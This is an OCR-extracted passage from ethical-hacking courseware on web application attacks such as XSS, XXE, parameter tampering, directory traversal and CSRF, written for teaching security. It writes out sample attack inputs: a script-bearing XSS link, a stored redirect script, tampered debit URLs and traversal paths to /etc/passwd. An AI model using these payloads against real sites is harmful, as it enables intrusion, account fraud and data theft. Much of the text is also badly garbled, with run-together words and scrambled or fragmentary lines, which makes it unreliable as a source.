‘Auser logsi n to www.certifiedhacker.com using his/her credentials.After
performing certain tasks, he/shecloses thewebbrowserwithoutlogging out ofthe
page.Thewebapplication's
if an attackerhasphysical
session interval,
launchthe browser, checkthe history,
is
sessiontimeout set to two hours.During
access to the user’s
system,
the specified
he may then
andclickthe www.certifiedhacker.com link,
whichautomatically redirectshimto the user'saccount without the needto enter
theuser'scredentials.
ical andCountermensores
Mackin ©by E-Comel
Copyright
3 -
SensitiveData Exposure
‘a
web
data
Mary aplations donotproperty
oom
unauthorised
wars
sensitive
protecthelr
Valnerable
Code
3 -
SensitiveData Exposure
Webapplications needto store sensitive informationsuchas passwords, creditcardnumbers,
account records,or otherauthentication
do not maintain propersecurity
as attackers
information
of their storage
can accessthe storage
i n a database
locations,
andmisusetheinformation.
a
or on filesystem.
then the application
If users
maybe at risk,
ical andCountermensores
Mackin ©by E-Comel
Copyright
screenshots
‘The belowshowpoorly vulnerable
encrypted codeandsecure codethatis properly
encrypted
using a secure cryptographic
algorithm.
Vulnerable Code
Figure
149:
unerable
cadeexample
SecureCode
Secure
14.10:
Figure
code example
Module4 1748
Page tical andCountermensores
Making by Comet
Copyright©
A4 XML External Entity
-
(XXE)
(8 wit
nity
tacks
allows
te
pa
XML
ase forgery
Input
em occurXML
unelable
source
External
ppiations parser
serversidereques
on
[SSF] tackthatc n wen a iscnfigured
refer
(a tates cana
the
web XML
itis webappcation
|G. Wen this matious inputi s prcested
tan externaentitybyincu
bytheweaklyconfiquted
XMLpri
reference
of target
i nthe mallow
tenes
application,
input
the
(XE)
44-XMIL External Entity
XML ExternalEntityattack is a Server-sideRequest
‘An Forgery(SSRF) attack whereby an.
application can parseXMLinputfroman unreliable s ource becauseofthe misconfigured XML
parser.In this attack,a n attackersendsa maliciousXML inputcontaining a referenceto an
externalentityto thevictim'sweb application. Whenthis malicious inputis processed bya
weaklyconfigured XML parserof the targetweb application, it enablesthe attackerto access
protected filesandservices fromservers or connectednetworks.
SinceXML featuresare widely available, the attackerabusesthesefeaturesto create
documents or files dynamically
at the time of processing.Attackerstend to makethe most of
this attack, as it allowsthemto retrieve confidential data,perform DoSattacks, andobtain
sensitive informationvia HTTP(S); i n some worst-case scenarios, theymay even be able to
perform remote codeexecution or launcha CSRF attack on anyvulnerable service.
According to the XML1.0 standard, XML usesentities oftendefinedas storage units. Entities
are special featuresof XMLthat can access localor remote contents, and theyare defined
anywhere in a system via systemidentifiers. Theentities neednot bepartof an XMLdocument,
as they can come froman externalsystem as well.Thesystem identifiersthat act as a URIare
usedbytheXMLprocessor whileprocessing the entity.TheXMLparsingprocess replaces these
entities with their actualdata, and here, the attackerexploits this vulnerability byforcing the
XML parserto accessthe file or the contentsspecified byhim/her. Thisattackmaybemore
dangerous as a trusted application; processingof XML documentscan be abusedbythe
attackerto pivotthe internalsystemto acquireall sorts of internaldataof the system,
For example, the attackersendsthe following code to extract the systemdatafromthe
vulnerabletarget.
Module4 1749
Page ical andCountermensores
Mackin Copyright
©
by E-Comel
Matclows
Request:
x
< Wie application
with weshy
Contgured Parser
ical andCountermensores
Mackin ©by E-Comel
Copyright
AS BrokenAccessControl
-
=—o
AS BrokenAccessControl
-
_
considerably
difficult.
ical andCountermensores
Mackin ©by E-Comel
Copyright
A6 -
Security
Misconfiguration
‘read/write
ies
unprotected andrectors, te
‘Layer
Protection hed
roteevonexposure datato utrusted
pares
secuneon esdto theft
AG -
Security
Misconfiguration
Developers
and networkadministratorsshould ensure that an entire application
stackis
configured
properly;
otherwise, misconfiguration
security can occur at any levelof the stack,
including its platform, web server,application server,framework, and custom code. For
instance,if the developer does not configure the server properly,
it couldresulti n various
problems that can affect the site security. Problemsthat lead to suchinstances include
Unvalidatedinputs,parameter/form
layer
protection, etc.
tampering,
improper
errorinsufficient
transport
handling,
Unvalidated Inputs
Inputvalidationflawsrefer to a web application vulnerability
whereby inputfrom a
clientis not validatedbeforebeing processed byweb applicationsbackendservers.
No validationor improper validationcan makea web application
inputvalidationattacks.If web applications implement
and
vulnerableto various
inputvalidation onlyon the
client side,attackerscan easily bypass it bytampering with the HTTPrequests, URLs,
headers, formfields, hiddenfields,andquery strings. login
Users’ IDsandotherrelated
data are storedi n the cookies,whichbecomea means of attack.An attackerexploits
inputvalidation
etc,resulting
flawsto performcross-sitescripting,
i n datatheft andsystemmalfunction, buffer
overflow,
injection attacks,
ical andCountermensores
Mackin ©by E-Comel
Copyright
Parameter/Form
Tampering
Figure 14.13:
Input
attack
Unvalidated
‘A
web parametertampering attackinvolvesthe manipulation
of parameters exchanged
betweenthe clientandthe server to modify application
datasuchas user credentials,
andpermissions,prices,andquantitiesof products.
Thisinformation is actually storedin
cookies,hiddenformfields, Theweb application
or URLquery strings. uses it to increase
its functionality
and control.A man-in-the-middle(MITM) attackis an example of this
typeof attack.Attackersuse toolssuchas WebScarab and WebSploit Frameworkfor
theseattacks.
Parametertampering is a simple typeof attack aimed directly at an application’s
business logic.
It takesadvantage of the factthat manyprogrammers relyon hiddenor
fixedfields(such as a hiddentag in a form or a parameter in a URL)
as the only security
measure for certain operations. To bypass this security mechanism, an attackercan
change these parameters. A parameter tamperingattack exploits vulnerabilities
in
integrityandlogic validationmechanisms that may resulti n XSS,SQLinjection,etc
DetailedDescription:
Aftera sessionis established
betweenthewebapplication andthe user, an exchange of
parameters betweenthe webbrowserandthe web application takesplace to maintain
information the needto maintain a complex
abouta client'ssession,whicheliminates
databaseon the server side.A web application
uses URLqueries,form fields,
and
cookiesto passtheseparameters.
Changing in the formfieldis the bestexample
parameters of parameter
tampering,
Whena user selectsan HTMLpage, it is storedas a formfieldvalueandtransferredas
HTTPpageto the web application.
‘an Thesevaluesmaybe pre-selected (combo box,
checkbox,radio buttons, etc.),free text, or hidden,An attackercan manipulate
these
values.In some extreme cases,the attackinvolvessavingthe page,editing the HTML,
andreloading the pagei n thewebbrowser.
Hiddenfieldsthat are invisibleto the end user provideinformationstatus to the web
application,
For example, considera product orderformthat includes the following
hidden
field:
<input type="hidden"name="price―
value="99.90">
ical andCountermensores
Mackin ©by E-Comel
Copyright
Comboboxes, checkboxes, andradiobuttonsare examples of pre-selected
parameters
usedto transferinformationbetweendifferent pageswhile allowing
one of severalpredefined
manipulatethesevalues.
values.In a parameter tampering
the
attack, user
to select
an attackermay
hetp://iner.certi
fiedhackerbank..com/cust.asp?profile=214debit=2500
The attackermay change (profile
the URLparameters and debit)
to debit another
account:
hetp://ev.certi
fiedhackerbank..con/cust.asp?profile=826debit=1500
The attackercan modify other URLparameters,including
attribute parameters and
internalmodules.Attribute parameters
are unique parametersthat characterize
the
behavior of the uploading
page. For example,
considera content-sharing
web
application
that enablesthe content creator to modify
the content,whileother users
can only
view thecontent. Theweb server checkswhetherthe user who is accessing
an
entryis the author or not (usually
via cookies).An ordinary user will requestthe
following link
hetp://mav.certi
fiedhackerbank.com/stat.asp?pg=S31Gstatuseview
Theattackercan modify
the status parameter
to “delete―
to delete permission
for the
content.
heep://www.certifiedhackerbank.con/stat. asp?pg=147éstatussdelete
ical andCountermensores
Mackin ©by E-Comel
Copyright
Parameter/form
tamperingc an leadto theftof services, escalationof access,s ession
hijacking, the identity
and assuming of other users, as well as parameters that grant
accessto thedeveloper
anddebugging
information,
hangedincluding,
toto para
Figure
14.14: Tampering
Parameter attackexample
Improper
Error Handling
Otherwise,
Improper
to
It is necessary definehowa system
the error mayprovide
error handling
or networkshouldbehave whenan error occurs.
a chancefor an attackerto break into the system.
mayleadto DoSattacks.
Improper error handling providesinsightsinto thesource code, suchas logic flawsand
defaultaccounts, whichthe attackerc an exploit.Usingthe informationreceivedfroman
error message,a n attackeridentifiesvulnerabilities for launching various web
applicationattacks.Improper exception handling occurs whenweb applications do not
limitthe amountof information theyreturn to their users. Information leakage may
include helpfulerror messagesand service banners. Developers and system
administrators often forgetor disregardhow an attacker can use something as simple as
a server banner.Theattackerwill start searching
andattemptto leverage
for a place
informationthat applications freely
to
identify
vulnerabili
volunteer.
Module4 1756
Page ical
and ©
Mackin Countermensores
Copyright
by E-Comel
General
Error
14.15:ScreenshotapayngInproperrors
Figure
Theattackercan gather
thefollowing fromimpropererror handling
information
Null pointer
system
exceptions
eal failure
Database
unavailable
Networktimeout
Database
information
Webapplication
logical
flow
©
Application
environment
InsufficientTransport Protection
Layer
Insufficienttransportlayer protection is a security flawthat occurs whenan application
fails to protectsensitive traffic flowing i n a network.It supports weakalgorithms and
uses expired or invalidcertificates.Developers shoulduse SSL/TLS authenticationfor
authenticationon the websites; otherwise, an attackercan monitor the networktraffic.
Unlesscommunication betweenwebsitesand clients is encrypted, data can be
intercepted, injected, or redirected.An underprivileged SSLsetupcan also helpthe
System
to
attacker launchphishing andMITM attacks.
mayleadto various otherthreatssuchas account theft,phishing
compromise
attacks,
and compromised layerprotection
adminaccounts.Thus,insufficienttransport
may allow untrusted third partiesto obtain unauthorizedaccess to sensitive
information.
All thisoccurs whenapplications supportweakalgorithms usedfor SSLand
whentheyuse expired or do not use themcorrectly
or invalidSSLcertificates
ical andCountermensores
Mackin ©by E-Comel
Copyright
Example
Assumethat auser logsinto an online banking application
that possesses insufficient
layerprotection
transport (j.e.,it is not SSLencrypted).
The sensitive data i n the
‘communication session1D)
(e.g., can bevulnerableto attackduringtransit in plaintext
format.Thisallowsan attackerto stealsuchdatato perform
various typesof attackson
the application,
problems
are
as
follows:
Someserver configuration
+
Server
flaws
software
+
Enabling
unnecessary
services
+
+
Improper
authentication
laws
Unpatched security
+
Server
configuration
scanners help
‘Automated
problems
to detect a few of theseproblems.
unusedpages,unpatched
Attackerscan access default
filesand directories,andso on to gain
accounts, flaws,unprotected
unauthorizedaccess. The person responsible shouldtake care of all suchunnecessaryand
unsafefeatures. Disabling
themcompletely wouldprove to be highly beneficial,preventing
outsidersfrom using them for maliciousattacks.Toavoid leakage of crucialinformationto
the networkadministrator
attackers, shouldthustakecare of all application-basedfilesthrough
proper authenticationand strongsecurity methods.For example, if the applicationserver
adminconsole installedandnot removed,
is automatically andthe defaultaccounts are not
changed, then the attackerdiscoversthe standardadminpages on the server, logsi n with
defaultpasswords,
andestablishes
controlover theserver.
ical andCountermensores
Mackin ©by E-Comel
Copyright
AT Cross-SiteScripting
-
Attacks
(KSS)
(©Comte
‘pl
neater
sete Ho
sym.
C5) ack
erm
X38Work
Ragen
ow Attacks
soa |@
&
‘=
Exploiting
user
privileges
Adsi n hiddenIFRAMESandpop-ups
=
Datatheft
Intranet probing
Data manipulation Keylogging
andremote monitoring
HowXSSAttacksWork
web pageconsistsof text andHTMLmarkup
‘A createdbythe server andobtainedbythe client
browser.Serverscan controltheclient'sinterpretation aboutthe staticallygenerated pages,
but theycannot completely control the client'sinterpretation of the output of the page
generateddynamically bythe servers. Thus, if the attackerinserts untrustedcontent into a
dynamic page,neitherthe server nor the client recognizesit. Untrustedinputcan come from
URLparameters,formelements, cookies,databasequeries, andso on
Module4 1759
Page ical andCountermensores
Mackin
©
Copyright
by E-Comel
If the dynamic bythe web server contains special
data inserted characters,
the user'sweb
browserwill mistakethem for HTML markup, as it treats some characters as specialto
distinguish
text from markup. Thus, an attacker can choose the data insertedinto the
generatedpage and misleadthe user'sbrowserinto running the attacker'sscript.As the
malicious
scriptswill execute in the browser'ssecurity context for communicatingwith the
legitimate
web server, the attackerwill have complete access to the documentretrievedand
maysendthedatain the pagebackto his/her site.
Note:Check
the
CEH Tools,Module14:Hacking
WebApplications,theXSS
for cheat
sheet.
ical andCountermensores
Mackin ©by E-Comel
Copyright
Cross-SiteScripting Attack Scenario:Attack via Email
In cross-sitescripting
a attackthat employs email,the attackercraftsan emailthat contains a
linkto the malicious scriptand sendsit to the victim,luringthe victim into clickingthe link
containingthe maliciousscript/query.Forexample, if the attackerfinds a cross-sitescripting
vulnerability
o n the bank.com website, he/she constructsa link embedded with a malicious
scriptsuchas
<AHREF=http: //bank .com/registration.cgi?clientprofile=<SCRIPT>maliciouscode</
SCRIPT>>Click here</A>
and sendsan email to the targetuser. Whenthe user clicksthe link,the URL is sent to
bank.com with the maliciouscode.Thelegitimateserver hosting
the bank.comwebsitesendsa
of
pagebackto the user including
user enters all the necessary
thevalue clientprofile,
personal
andthe malicious
the clientmachine.Themaliciouscodeasksthe victim to enter profile
detailsand clicksSubmit,
codeis executedon
information. Afterthe
the attackerreceives the
information.Theattackercan use thesedetailsto impersonate the user to gain accessto the
User's
online
account
other
fraudulent
activities.
bank andperform
ical andCountermensores
Mackin ©by E-Comel
Copyright
attack viaeral
18.17:Â¥88
Figure
XSSExample:
Attackvia Email
Attacker Server
Malicious
Seript
attacker's Legitimate
ina
Figure
14.18:
X35example
attackvi email
ical andCountermensores
Mackin ©by E-Comel
Copyright
XSSExample:
Stealing
Users’
Cookies
Attacker Server
Malicious
Browser
User's
Seript
‘Attacker's
Server
Legitimate
sitions
consiructa
© maticous
( _Segiaeeariontink
oyvetinntpetinon
XSSExample: an Unauthorized
Sending Request
X55
Figure 16.19:
example
cookies wer’
Stealing
Attacker Server
Malicious
User's
Browser
Script
‘attacker's
Server
Legitimate
time
@ conse mation
aN prt emer
Onn. i
oe
Pema
te,
Figure an unauthorized
14.2035 exampleSending request
ical andCountermensores
Mackin ©by E-Comel
Copyright
XSSAttackin BlogPosting
XSSAttack in Blog
Posting
Theattackerfindsan XSSvulnerability
i n the techpost.org
website,constructsa maliciousscript
ponload=window.location="http://www.certifiedhacker.com’</scrip
and addsit i n
the comment field of TechPost. Thismaliciousscriptposted bythe attackeris storedon the
application
‘web database server and runs i n the background.
Whena user visits theTechPost
website,the maliciousscriptinjected bythe attackerin the TechPostcomment field activates
andredirectsthe user to the malicious websitecerti
ical andCountermensores
Mackin ©by E-Comel
Copyright
XSSAttackin CommentField
XSSAttack in CommentField
Many
web applications
use HTMLpagesthat dynamically
acceptdatafromdifferent sources.
(Onec an
change
thedatai n the HTML pagesaccording
pagetagsto manipulate
malicious
data.They
to the request.
launchan attackbychanging
Attackers
use HTMLweb
the comments featureusinga
Whenthe targetseesthecomment and activatesit, thenthetargetbrowser
script.
scriptto accomplish
executesthemalicious the attacker'sgoals.
Forexample, an attackerfinds a vulnerablecomment field i n the TechPost.org
website.Thus,
heconstructsthe malicious script“<script>alert
("Hello World") </script>“
andaddsit along
with his comment in the comment field of TechPost. Thismaliciousscript,along
with the
comment posted
bythe attackeri n the comment field,i s storedon the web application's
databaseserver. Whena user visits the TechPostwebsite,
the codedmessage “Hello
World―
popsup whenever the web pageis loaded.Therefore,whenthe user clicksOKi n the pop-up
window,theattackercan gainaccessto the user'sbrowserandsubsequentlyperform malicious
activities.
Module4 1765
Page ical andCountermensores
Mackin
©
Copyright
by E-Comel
nment el
recounet
A8 InsecureDeseri:
-
alization
| ssa
48 InsecureDeserialization
-
14.23Serialization
Figure process
»yeo-Goune
Deserialization
i s the reverse processof serialization,
Deserialization whereby the objectdata is
recreatedfrom the linear serializeddata. Due to the process of deserialization,
the
serializedEmployee objectgivenin the abovementioned example will be reconverted
data the
into the object as showni n figurebelow:
<Employee>iame>Rinni
</Nane><Age>26</
ty><Enp1D>2201</EmpID></Employee>
Nevadac/Ci
J
Deserialization
cmon
|
Nome
inn
InsecureDeserialization
Thisprocessof serializationand deserializationi s effectively
used in communication
betweennetworks, and its widespread
usageattracts attackersto exploit
the flawsi n
this process.Attackersinjectmaliciouscode into serializedlinearformatteddata and
forwardthe maliciousserializeddata to the victim, An example of maliciouscode
injection lineardatabythe attackeris shownbelow:
into serialized
-<Employee><Name>Rinni</Name><Age>26</Age><City>Nevada
</City><EmpID>2201</EmpID>MALICIOUS
PROCEDURE</Employee>
Due to insecure deserialization,
the injected
maliciouscodewill be undetectedand
remain presenti n the finalexecution of the deserialization
code.Thisresultsi n the
execution of malicious
in the following
figure: procedures
of
along
withthe execution serialized data,
as shown
ical andCountermensores
Mackin ©by E-Comel
Copyright
Attacker
m aliciouscodein
Injects
serialized data
‘<Emp
loyoa><tana>Ainn!
</Nane><Age>?6</A
ty>hevada
</Chty><Bnpl0>2203¢/EmpIDMALICIOUS
PROC
Insecure
Deserialization
[ene Jom a =
Wack
“ & 4 EN
Name
bee‘ty
26
Emi
14.25:
Figure Insecure
Deseriization
stack
Thiscouldhave a severe impacto n the system, as it wouldauthorizethe attackerto
execute and run systems remotely.Moreover, any softwareor server vulnerableto
attackscouldbeadversely
deserialization affected.
ical andCountermensores
Mackin ©by E-Comel
Copyright
AQ -
and
always
privileges,flawsa anycomponent
an result i n
by
dependencies
anaiss
scanning
or byperforming
manual
asDatabase
such Exploit
expel
a.com),
(http://w.
andSecurtyFoeus
(htes://wwc
secrtyfocus.com)
fa unerablecomponents
isnt, theattacker
9 -
known
with
Web aopation
vulnerable
components
14.26:Attackona
Figure
web vulnerable
components
application
withknawn
Module4 1770
Page
©
ical andCountermensores
Mackin Copyright
by E-Comel
14.27:Screenshotdisplaying
Figure Databaseseach resus forweb application
Explolt exploit
ical andCountermensores
Mackin ©by E-Comel
Copyright
A10 InsufficientLogging
-
and Monitoring
and Monitoring
Webapplications maintain logsto track usage patterns, suchas user logincredentialsand
adminlogin credentials.Insufficient loggingandmonitoring referto scenarios i n whichthe
detectionsoftwareeitherdoesnot recordthe maliciousevent or ignoresthe important details
aboutthe event.Attackers usually inject,delete, or tamperwith the web application logsto
engagein maliciousactivities or hidetheiridentities.Dueto insufficientloggingandmonitoring,
perform maliciousattacks, of
the detectionof maliciousattemptsthe attackerbecomes
suchas password brute-forcing,
m ore difficultandthe attackerc an
to stealconfidentialpasswords.
18.28:attack ona
Figure with nsfficientlogging
web application a ndmonitoring
ical andCountermensores
Mackin ©by E-Comel
Copyright
OtherWebApplication
Threats
OtherWebApplication
Threats
Webapplication
threatsare not limited to attacksbasedo n URLand port 80. Despite
using
ports,protocols,
and OSI layers, vendorsmust protectthe integrityof mission-critical
applications
attacks
being
able all
frompossible
Thevarious types
future
of webapplication
by
threatsare
to dealwith attackmethods.
as follows:
+
Directory
Traversal
Attackersexploit
HTTP bydirectory whichgivesthem accessto restricted
traversal,
directories;
theyexecutecommands
outsidethewebserver'sroot directory.
UnvalidatedRedirects
andForwards
Attackerslurevictims into clicking
on unvalidatedlinksthat appearto be legitimate.
Suchredirectsmayattemptto installmalwareor trickvictims into disclosing
passwords
or other sensitive information.Unsafeforwards may allow access control bypass,
leading
*
to
Session
FixationAttack
+
Security Exploits
Management
+
Failure
to RestrictURLAccess
+
Watering
HoleAttack
File
Malicious Execution
It is a typeof unvalidatedredirectattackwhereby
the attackerfirst identifiesthe most
visitedwebsiteof the target,determinesthe vulnerabilitiesi n the website, injects
maliciouscode into the vulnerableweb application,
and then waits for the victim to
ical andCountermensores
Mackin ©by E-Comel
Copyright
browsethe website.Oncethe victim tries to accessthe website,
the maliciouscode
infecting
executes, the victim,
Cross-Site
Request
Forgery
Thecross-siterequestforgery methodis a typeof attackin whichan authenticateduser
is madeto performcertain taskson theweb application that an attackerchooses,
e.g., 2
user ona
clicking particular
Cookie/SessionPoisoning
linksent through
or
an email chat.
ical andCountermensores
Mackin ©by E-Comel
Copyright
Broken
SessionManagement
If sessionIDsare exposed i n the URL, then web applicationsare vulnerableto session
fixationattacks.Furthermore,
changed ifthe session timeout is longer
after every login,attackersmay hijack
session with the same privilegesas the victim.
andthe session IDs are not
the session and take controlof the
BrokenAccountManagement
functions,
Vulnerableaccount management including
account update,
forgotten
or lost
password
recovery, reset password, mightweakenvalid
and other similarfunctions,
authenticationschemes,
(DoS)
Denial-of-Service
‘A
DoSattackis an attackon the availability
of a service, whichreduces, restricts,
or
preventsa ccess to systemresources byits legitimate users. For instance,a website
relatedto a banking
or emailservice may not able to functionfor a few hoursor even
days,
resulting
i n theloss
of time andmoney.
BufferOverflow
web application's
‘A bufferoverflowvulnerabilityoccurs whenit fallsto guard
i ts buffer
properly
andallowswritingbeyond its maximum size.
Attacks
CAPTCHA
CAPTCHA typeof test implemented
i s a challenge-response byweb applications
to
checkwhetherthe response is generated bya computer.Although CAPTCHAsare
designedto be unbreakable,
theyare proneto various typesof attacks.
PlatformExploits
using different platforms
Userscan build various web applications such as BEA
Weblogic and Cold Fusion.Eachplatformhas various vulnerabilities
and exploits
associated
with it
NetworkAccessAttacks
Networkaccessattackscan majorly
affectwebapplications,
including
a basiclevelof
service. They
c an alsoallow levelsof access that standardHTTPapplication
methods
cannot
DMZProtocol
grant,
Attacks
The demilitarizedzone (DMZ) is a semi-trustednetwork zone that separates the
untrustedInternet fromthe company's trustedinternalnetwork.An attackerwho can
compromise a system that allowsother DMZ protocols hasaccessto other DMZsand
internalsystems.Thislevelof access can leadto
©
©.
Compromise
Defacement
of
the webapplication
ofwebsites
and data
ical andCountermensores
Mackin ©by E-Comel
Copyright
to internal
‘Access systems, backups,
databases,
including andsource code
Timing
Web-based Attacks
timingattacksexploit
Web-based
takenforsecret key
andpasswords
operations.
leakage
side-channel
perform
Attackers
for accessingwebapplications.
andestimate the amount time
theseattacks
to of
retrieve usernames
MarioNet Attack
‘Attacker
abusetheServiceWorkers andrun maliciouscodei n thevictim's
API to inject
browserto perform various attackssuch as cryptojacking,DD0S, click fraud,and
password
distributed cracking.
RC4NOMORE Attack
A
Rivest CipherNumerousOccurrence
attackis an attackagainst
present
MOnitoring
the RC4stream cipher.
and Recovery Exploit
Thisattackexploits
in a web server that usesthe RC4encryption algorithm
(RC4 NOMORE)
thevulnerabilities
for accessing encrypted
sensitive information.Attackersuse RC4NOMOREto decrypt the webcookiessecured
bythe HTTPSprotocol andinjectarbitrary packets. Afterstealing the
a valid cookie,
attackerimpersonates the victim andlogsinto thewebsiteusing thevictim'scredentials
to perform maliciousactivities andunauthorizedtransactions.
Clickjacking
Attack
In clickjacking, iframe.Then,
the attackerloadsthe targetwebsiteinsidea low opacity
the attackerdesignsa page suchthat all the clickable
items suchas buttons are
positionedexactly
as on the selectedtargetwebsite.Whenthe victim clickson the
invisible theattacker
elements, performsvarious malicious
actions.
JavaScriptHijacking
JavaScript hijacking,
also known as JSONhijacking, is a vulnerability
that enables
attackersto capturesensitive informationfromsystems Objects
usingJavaScript (JSON)
asa datacarrier. Thesevulnerabilitiesa rise fromflawsin thewebbrowser’s
same-origin
policy that permitsa domainto addcodefromanother
Rebinding
DNS Attack
domain.
perform
‘Attackers DNSrebinding attacksto bypass
the same-originpolicy's
security
constraints andcommunicate with or makearbitrary to localdomainsthrough
requests
maliciouswebpage.
‘a
ical andCountermensores
Mackin ©by E-Comel
Copyright
Traversal
Directory
‘uci
can tht with
manipulate vibes fren les dt lsh)
A=
Traversal
Directory
When access is provided
outside a defined application,
there exists the possiblity
of
unintendedinformation disclosure or modification.
Complex are configured
applications with
multiple
directoriesthat exist as application
components anddata.An application
can traverse
to locateand execute the legitimate
thesedirectories portionsof an application.
A directory
traversal/forceful
browsing attackoccurs whenthe attackeris able to browsethe directories
andfilesoutsidethe normalapplicationaccess. Suchan attackexposesthe directory structure
of an application
andoftenthe underlying web server andoperatingsystem.Directory traversal
allows attackers to access restricted directories, includingapplication source code,
configuration, files,and execute commands
andcriticalsystem outsidethe webserver'sroot
directory.
Withthisevel of access to webapplication
architecture,
a n attackercan
+
+
Enumerate
the
contents
of
files
and directories
(and
pagesthat otherwiserequireauthentication
Access payment)
possibly
+
Gainsecret knowledge
of the application
andits construction
+ user IDsandpasswords
Discover storedi n hiddenfiles
+
+
Locate
source
other
interesting
left
codeand
View sensitivedatasuchas customer information
files onthe server
Example:
The following
exampleuses“./"
to go backto severaldirectoriesandobtain file containing
the backup
of a webapplication
http://www-targetsite.com/../.././sitebackup.zip
ical andCountermensores
Mackin ©by E-Comel
Copyright
Thisexample obtainsthe “/etc/passwd―
filefroma UNIX/Linux whichcontains user
system,
account information
http://www.targetsite.com/././././ete/passwd
Letus consideranotherexample
i n whichan attackertries to accessfileslocated
outsidea web
publishing
directory
using directory
traversal
http://www dir/somefile
certfiedhacker.com/process.aspx?page=.././././some
dir/some
http://www.certifiedhacker.com/../././../some
file
ical andCountermensores
Mackin ©by E-Comel
Copyright
UnvalidatedRedirectsand Forwards
whereas
(©Unvalidated
redirectsenableattackers
to ntl malwareor trickvictimsint dcosingpasswordsor other sensitive
Information, unafeforwardsmayallow
acces contro bypassed
tobe
UnvalidatedRedirectsandForwards
Unvalidatedredirectsenableattackersto install malwareor trick victims into disclosing
passwords or othersensitive information, whereasunsafeforwardsmayallowaccesscontrol
bypass.An attackersendslinks to unvalidatedredirectsand luresthe victim into clicking on
them. When thevictim clickso n the
passwords
link,
thinking
that itis a valid site, it redirects
Security
Management Exploits
Some attackerstargetsecuritymanagement systems,either i n networksor i n the
application
layer,to modify enforcement.
or disablesecurity An attackerwho exploits
management
security can directly
modifyprotectionpolicies,
delete existingpolicies,
andmodify
addnew policies, applications,
system data,
andresources.
Failureto RestrictURLAccess
application
‘An often safeguards sensitive functionality
or protects and preventsthe
displays
oflinksor URLsforprotection,
Attackers
accessthoselinksor URLsdirectly
and
perform
illegitimate
operations.
ical andCountermensores
Mackin ©by E-Comel
Copyright
=
Malicious
FileExecution
Maliciousfile execution vulnerabilitiesare presentin most applications.
The cause of
this vulnerability
is unvalidatedinputto a web server. Thus, attackersexecute and
processfiles on a web server and initiate remote code execution,install a rootkit
remotely,and—in at leastsome cases—takecomplete controlof the systems.
In an “unvalidated scenario,a user receives a phishing
redirect― luring
emailfroman attacker,
the user into clicking
the link. Thelink (malicious query)appears to be legitimate
becauseit
containsthename of a legitimate websitesuchas www.certifiedhacker.com at thebeginning
of
the
URL. However,
of
the latter part thelink contains
a URL(www.evilserver.com),
malicious
which it redirects the victim. When the user clicks the link, it redirects to the
www.evilserver.com website,and the server that hoststhe websitemightperform
illegal
to
(Mtothet femme ee
Unvalidated Forward
tech ag
24.20 Unvalidated
Figure
para
ewok
RedirectsandForwardsexample
ical andCountermensores
Mackin ©by E-Comel
Copyright
Hole Attack
Watering
‘tacker
identifies
3 the kind
ofwebsitestarget frequentsurfs
company/indvidal a ndtests those
particle
spplation that
ca thewebpage
redirect anddowloadmalware
onto thevicim machine
‘on
hoe altackbecausetheattacker
Thisattack scale a watering
watingfos preyto arrive ata watering
wats
haeto dik water
forh e victimto flint
a trap,sia to
{When
downloaded
being
through
the victimsurfs
tothevet
theinfectedwebsite,
thewebpagerediects
themachine
machine, compromising
toa
2 wells
malicious serve,
thenatworK/orgaiaton
leading
tomalware
Hole Attack
Watering
In a wateringhole attack,
the attackeridentifiesthe kind of websitesfrequently
surfedbya
targetcompany/individual andtests thesewebsitesto identify any possiblevulnerabilities.
he/she
Oncethe attackeridentifiesthe vulnerabilities, injectsa maliciousscript/code
into the
‘webapplicationthat can redirectthe web page and downloadmalwareonto the victim's
machine.After infecting the vulnerableweb application, the attackerwaits for the victim to
access the infectedweb application. Thisattackis calleda wateringholeattack, as the attacker
waits for the victim to fall into the trap,similarto a lion waitingfor its prey to arrive at a
wateringhole to drink water. Whenthe victim surfsthe infectedwebsite, the web page
redirectshim/her anddownloadsmalwareonto his/her machine,compromising the machine
andindeedcompromising the network/organization
artacher Malisous
Server
ical andCountermensores
Mackin ©by E-Comel
Copyright
Cross-SiteRequest
Forgery Attack
(CSRF)
ow
CSRF
Attacks Work
pat
eh page
T hevictim
on
hols actve
Cross-SiteRequest (CSRF)
Forgery Attack
requestforgery
Cross-site also knownas a one-clickattack,occurs when a hacker
(CSRF),
instructs a
user’s
to
webbrowser senda requestto thevulnerablewebsitethrough
web page.Finance-related websitescommonly
attackerscannot access corporate intranets;
contain CSRF
hence,
a malicious
vulnerabilities.Usually,
outside
CSRFis one of the methodsusedto enter
these networks.The inability of web applications to differentiate a requestmade using
maliciouscodefrom a genuinerequest exposesit to a CSRFattack.Suchattacksexploit web
page vulnerabilities that allow attackersto forceunsuspecting users’browsersto send
maliciousrequests that theydid not intendto send.Thevictim user holdsan active session with
a trustedsite andsimultaneously visits a malicioussite, whichinjects a n HTTPrequestforthe
trustedsite into the victim user'ssession,compromisingits integrity.
In this scenario, the attackerconstructs a maliciousscriptand stores it on a maliciousweb
server. Whena user visits the website,
access to the user'sbrowser.
the
malicious
scriptand
the
attacker
gains
starts running
ical andCountermensores
Mackin ©by E-Comel
Copyright
Bo‘Trusted
Website
ee
Malicious
Website
C#
CoOiissiesisiss
&
Attacks
HowCSRF Work
Figure
14.32:
Cros
Request
(CSRF
attack Site Forgery example
In a CSRF attack,the attackerwaits for the user to connect with a trustedserver andthentricks
the
user into clicking
on a malicious
link,i t executesthe arbitrary
involvedi n a CSRFattack.
link containing arbitrarycode.Whenthe user clickson the
codeon the trustedserver. Thediagram belowexplains the steps
Malicious Code
14.33:
Figure ofCross
Working SteRequest
Forgery
(SRF)attack
ical andCountermensores
Mackin ©by E-Comel
Copyright
Cookie/SessionPoisoning
‘How
Cookie
Polroning
Works
Inject
Malicious
Content
he
Cookie/SessionPoisoning
Cookiesa re generally usedto maintain a session betweenweb applications and users; thus,
cookiesneedto transmitsensitive credentials frequently.
Theattackercan modifythecookies’
of
Informationwith ease to escalatea ccessor assumethe identityanother user.
Usually,
he/she a
the ai m of session is to uniquely
is accessing.
malicious
Poisoning
content or modify
cookies
bind every individualwith the web application
andsessioninformation
that
can allowan attackerto inject
theuser'sonlineexperience andobtainunauthorizedinformation,
Cookiescan contain session-specific datasuchas user IDs,passwords, account numbers, links
to shopping cart contents,suppliedprivateinformation, and sessionIDs.They exist as files
storedi n the client computer's memory or harddisk.A proxy can be usedfor rewriting the
sessiondata,displaying the cookiedata,and/or specifyinga new user ID or other session
Identifiersi n the cookie.Bymodifying the datai n a cookie,an attackerc an often gain escalated
accessor maliciously affectthe user'ssession.Many sitesofferthe abilityto "Remember me?―
andstore the user'sinformationi n a cookieso the user doesnot haveto re-enter thedatawith
